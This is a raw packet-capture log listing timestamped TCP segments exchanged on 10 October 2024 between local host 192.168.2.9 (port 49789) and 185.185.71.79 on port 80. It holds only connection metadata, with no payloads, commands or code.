                                                                                                                                                                                        Oct 10, 2024 13:39:44.468559027 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.473591089 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.473684072 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.473685026 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.473742008 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.507863045 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.507919073 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.507941008 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.507992983 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.583226919 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.583244085 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.583261013 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.583312988 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.583343029 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.583353996 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.583435059 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.583547115 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.583561897 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.583576918 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.583591938 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.583614111 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.583614111 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.583635092 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.583682060 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.583682060 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.584336996 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.584388971 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.584403992 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.584434032 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.584434032 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.584446907 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.584460974 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.584500074 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.584500074 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.585237026 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.585253000 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.585267067 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.585289001 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.585289001 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.585304976 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.585319996 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.585319996 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.585356951 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.585356951 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.586077929 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.586126089 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.586143970 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.586263895 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.594594955 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.594613075 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.594666958 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.595407009 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.624492884 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.624516964 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.624531031 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.624587059 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.624587059 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698092937 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698138952 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698156118 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698173046 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698196888 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698203087 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698219061 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698239088 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698271036 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698463917 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698478937 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698503017 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698512077 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698512077 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698518038 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698534966 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698549032 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698558092 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.698576927 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.699044943 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.699096918 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.699110031 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.699112892 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.699151993 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.699151993 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.699156046 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.699172020 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.699187994 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.699188948 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.699204922 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.699225903 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.699225903 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.699244976 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.699897051 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.699970961 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.699985027 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700007915 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700018883 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700027943 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700042963 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700057983 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700062990 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700062990 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700098038 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700098038 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700568914 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700593948 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700634003 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700634003 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700654030 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700668097 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700736046 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700752974 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700767994 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700783968 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700788975 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.700819969 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.701746941 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.701761961 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.701776981 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.701792002 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.701807022 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.701821089 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.701836109 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.701838970 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.701838970 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.701878071 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.701878071 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.702411890 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.702429056 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.702444077 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.702460051 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.702481985 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.702481985 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.702513933 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.711278915 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.711293936 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.711309910 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.711349964 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.711411953 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.737935066 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.737976074 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.738010883 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.738028049 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.738028049 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.738044024 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.738080978 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.738080978 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.785034895 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.785094976 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.785099983 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.785129070 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.785176992 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.785176992 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.812944889 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.812964916 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.812975883 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813002110 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813045025 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813369036 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813419104 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813426018 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813438892 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813477039 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813477039 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813498020 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813510895 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813522100 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813575983 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813575983 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813586950 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813596964 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813608885 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813663960 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813663960 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813812971 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813867092 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813878059 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813882113 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813915014 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813926935 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813936949 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813946962 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.813946962 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.814006090 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.814021111 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.814033031 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.814043999 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.814054966 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.814091921 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.814091921 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.814912081 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.814970970 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.814990044 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815001011 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815011024 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815032005 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815076113 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815078974 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815090895 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815102100 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815115929 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815139055 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815181971 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815192938 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815203905 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815212965 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815218925 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815244913 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815244913 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815404892 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815538883 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815557003 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815567970 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815592051 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815670013 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815681934 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815692902 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815705061 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815705061 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815732002 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815732002 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815737009 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815748930 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815761089 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815763950 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815814972 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815814972 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815826893 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.815838099 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816014051 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816463947 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816493988 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816504955 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816525936 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816525936 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816543102 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816549063 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816600084 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816612005 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816664934 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816664934 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816703081 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816715002 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816725969 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816737890 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816749096 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816749096 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816777945 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816797018 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816812992 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.816925049 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817497969 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817544937 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817558050 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817562103 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817637920 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817637920 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817651033 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817662954 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817688942 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817712069 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817723036 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817732096 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817743063 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817744017 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817754030 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817770004 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817826033 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817837954 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817871094 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.817871094 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.824888945 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.824907064 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.824918985 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.824929953 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.824942112 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.824949980 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.824980974 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.825489044 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.871669054 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.871701956 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.871751070 CEST8049789185.185.71.79192.168.2.9
                                                                                                                                                                                        Oct 10, 2024 13:39:44.871771097 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.871771097 CEST4978980192.168.2.9185.185.71.79
                                                                                                                                                                                        Oct 10, 2024 13:39:44.871786118 CEST8049789185.185.71.79192.168.2.9
